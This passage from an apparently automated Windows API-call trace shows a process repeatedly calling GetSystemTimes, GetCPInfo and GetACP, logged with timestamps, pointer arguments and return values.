lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.783] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.783] GetACP () returned 0x4e4 [0077.783] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.783] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.783] GetACP () returned 0x4e4 [0077.783] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.783] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.783] GetACP () returned 0x4e4 [0077.783] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.783] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.783] GetACP () returned 0x4e4 [0077.783] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.783] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.783] GetACP () returned 0x4e4 [0077.783] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.783] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.783] GetACP () returned 0x4e4 [0077.783] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.784] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.784] GetACP () returned 0x4e4 [0077.784] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.784] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.784] GetACP () returned 0x4e4 [0077.784] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.784] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.784] GetACP () returned 0x4e4 [0077.784] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.784] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.784] GetACP () returned 0x4e4 [0077.784] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.784] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.784] GetACP () returned 0x4e4 [0077.784] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.784] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.784] GetACP () returned 0x4e4 [0077.784] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.784] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.785] GetACP () returned 0x4e4 [0077.785] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.785] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.785] GetACP () returned 0x4e4 [0077.785] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.785] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.785] GetACP () returned 0x4e4 [0077.785] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.785] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.785] GetACP () returned 0x4e4 [0077.785] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.785] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.785] GetACP () returned 0x4e4 [0077.785] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.785] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.785] GetACP () returned 0x4e4 [0077.785] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.785] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.785] GetACP () returned 0x4e4 [0077.785] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.786] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.786] GetACP () returned 0x4e4 [0077.786] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.786] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.786] GetACP () returned 0x4e4 [0077.786] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.786] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.786] GetACP () returned 0x4e4 [0077.786] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.786] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.786] GetACP () returned 0x4e4 [0077.786] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.786] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.786] GetACP () returned 0x4e4 [0077.786] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.786] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.786] GetACP () returned 0x4e4 [0077.786] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.786] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.786] GetACP () returned 0x4e4 [0077.787] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.787] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.787] GetACP () returned 0x4e4 [0077.787] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.787] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.787] GetACP () returned 0x4e4 [0077.787] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.787] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.787] GetACP () returned 0x4e4 [0077.787] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.787] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.787] GetACP () returned 0x4e4 [0077.787] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.787] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.787] GetACP () returned 0x4e4 [0077.787] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.787] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.787] GetACP () returned 0x4e4 [0077.787] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.787] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.788] GetACP () returned 0x4e4 [0077.788] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.788] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.788] GetACP () returned 0x4e4 [0077.788] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.788] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.788] GetACP () returned 0x4e4 [0077.788] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.913] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.913] GetACP () returned 0x4e4 [0077.913] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.913] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.913] GetACP () returned 0x4e4 [0077.913] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.913] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.914] GetACP () returned 0x4e4 [0077.914] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.914] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.914] GetACP () returned 0x4e4 [0077.914] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.914] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.914] GetACP () returned 0x4e4 [0077.915] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.915] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.915] GetACP () returned 0x4e4 [0077.915] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.915] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.915] GetACP () returned 0x4e4 [0077.915] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.915] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.916] GetACP () returned 0x4e4 [0077.916] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.916] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.916] GetACP () returned 0x4e4 [0077.916] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.916] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.917] GetACP () returned 0x4e4 [0077.917] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.917] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.917] GetACP () returned 0x4e4 [0077.917] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.917] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.917] GetACP () returned 0x4e4 [0077.917] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.918] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.918] GetACP () returned 0x4e4 [0077.918] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.918] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.918] GetACP () returned 0x4e4 [0077.918] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.918] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.918] GetACP () returned 0x4e4 [0077.918] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.919] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.919] GetACP () returned 0x4e4 [0077.919] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.919] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.919] GetACP () returned 0x4e4 [0077.919] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.920] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.920] GetACP () returned 0x4e4 [0077.920] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.920] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.924] GetACP () returned 0x4e4 [0077.924] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.924] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.924] GetACP () returned 0x4e4 [0077.924] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.924] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.924] GetACP () returned 0x4e4 [0077.924] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.924] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.924] GetACP () returned 0x4e4 [0077.925] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.925] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.354] GetACP () returned 0x4e4 [0078.354] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.354] GetACP () returned 0x4e4 [0078.354] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.355] GetACP () returned 0x4e4 [0078.355] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.355] GetACP () returned 0x4e4 [0078.355] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.355] GetACP () returned 0x4e4 [0078.355] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.355] GetACP () returned 0x4e4 [0078.355] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.355] GetACP () returned 0x4e4 [0078.355] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.355] GetACP () returned 0x4e4 [0078.355] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.355] GetACP () returned 0x4e4 [0078.355] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.355] GetACP () returned 0x4e4 [0078.355] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.356] GetACP () returned 0x4e4 [0078.356] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.356] GetACP () returned 0x4e4 [0078.356] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.356] GetACP () returned 0x4e4 [0078.356] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.356] GetACP () returned 0x4e4 [0078.356] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.356] GetACP () returned 0x4e4 [0078.356] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.356] GetACP () returned 0x4e4 [0078.356] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.356] GetACP () returned 0x4e4 [0078.356] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.356] GetACP () returned 0x4e4 [0078.356] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.357] GetACP () returned 0x4e4 [0078.357] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: 